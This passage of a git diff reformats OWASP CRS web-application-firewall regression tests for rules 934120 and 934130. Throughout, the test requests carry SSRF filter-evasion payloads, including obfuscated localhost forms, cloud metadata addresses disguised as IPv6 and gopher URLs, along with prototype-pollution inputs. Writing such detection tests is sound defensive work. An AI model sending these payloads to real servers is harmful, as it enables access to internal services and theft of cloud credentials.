+ log_contains: id "934120"
+ - test_id: 25
 desc: SSRF - Enclosed alphanumerics 3 - text
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-26
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 26
 desc: SSRF - Enclosed alphanumerics 3 - text
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-27
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 27
 desc: SSRF - 8-Bit Octal conversion
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=ssh://0177.00.00.01"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-28
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=ssh://0177.00.00.01"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 28
 desc: SSRF - 32-Bit Octal conversion
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=rtmp://017700000001"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-29
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=rtmp://017700000001"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 29
 desc: SSRF - 32-Bit Hex conversion
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=gopher://0x7f000001"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-30
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=gopher://0x7f000001"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934120"
+ - test_id: 30
 desc: SSRF - IPv6, first byte full, rest compressed
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://[a::]"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-31
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+
uri: "/get?ssrf=http://[a::]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 31 desc: SSRF - IPv6, first byte full, last byte full, rest compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[a::b]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[a::b]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 32 desc: SSRF - IPv6, compressed in the middle stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 33 desc: 
SSRF - IPv6, link-local unicast with zone ID, compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[fe80::%zone1]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[fe80::%zone1]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 34 desc: SSRF - IPv6, link-local unicast with zone ID, full stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 35 desc: SSRF - IPv6, IPv4 mapped stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 36 desc: SSRF - IPv6, IPv4 compatible stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 37 desc: SSRF - URL bypass, IP + domain stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 38 desc: SSRF - URL bypass, domain + IP stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 39 desc: SSRF - Enclosed alphanumerics, dots stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" 
- User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169。254。169。254/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169。254。169。254/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 40 desc: SSRF - IPv6, the unspecified address stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[::]/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[::]/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 41 desc: SSRF - Glibc NSS features stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - 
Accept-Language: en-us,en;q=0.5 - method: GET - uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 42 desc: SSRF - Glibc NSS features stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 43 desc: SSRF - Input variable coverage test (Dotless decimal) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Cookie: ssrf=http://2852039166/ - method: "GET" - uri: "/get" - version: 
"HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Cookie: http://2852039166/ - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: POST - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="file"; filename="http://2852039166/?.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Cookie: ssrf=http://2852039166/ + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Cookie: http://2852039166/ + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: POST + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="file"; filename="http://2852039166/?.txt" + Content-Type: text/plain - My epic SSRF attempt + My epic SSRF attempt - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: application/xml - method: POST - uri: "/post" - data: "http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 
934120-44 + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?http://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: application/xml + method: POST + uri: "/post" + data: "http://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 44 desc: SSRF - local_file:// url scheme - Dotless decimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=local_file://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=local_file://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml index 3a667cc5a..f18d6bc0a 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml 
@@ -1,220 +1,206 @@ --- meta: author: "lifeforms, azurit" - enabled: true - name: "934130.yaml" description: "Tests for rule 934130" +rule_id: 934130 tests: - - test_title: 934130-1 + - test_id: 1 desc: negative test case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=proto" - version: HTTP/1.0 - output: - no_log_contains: id "934130" - - test_title: 934130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=proto" + version: HTTP/1.0 + output: + no_log_contains: id "934130" + - test_id: 2 desc: positive test case with JSON POST stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} - output: - log_contains: id "934130" - - test_title: 934130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} + output: + log_contains: id "934130" + - test_id: 3 desc: positive test case, CVE-2021-20083 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[test]=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?__proto__[test]=test" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 4 desc: positive test case, CVE-2021-20084, 1/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__.test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__.test=test" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 5 desc: positive test case, CVE-2021-20084, 2/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor.prototype.test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor.prototype.test=test" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 6 desc: positive test case with space evasion, CVE-2021-20084, 2/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor.prototype.%20test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor.prototype.%20test=test" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 7 desc: positive test case with GET parameter, jQuery $.get stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
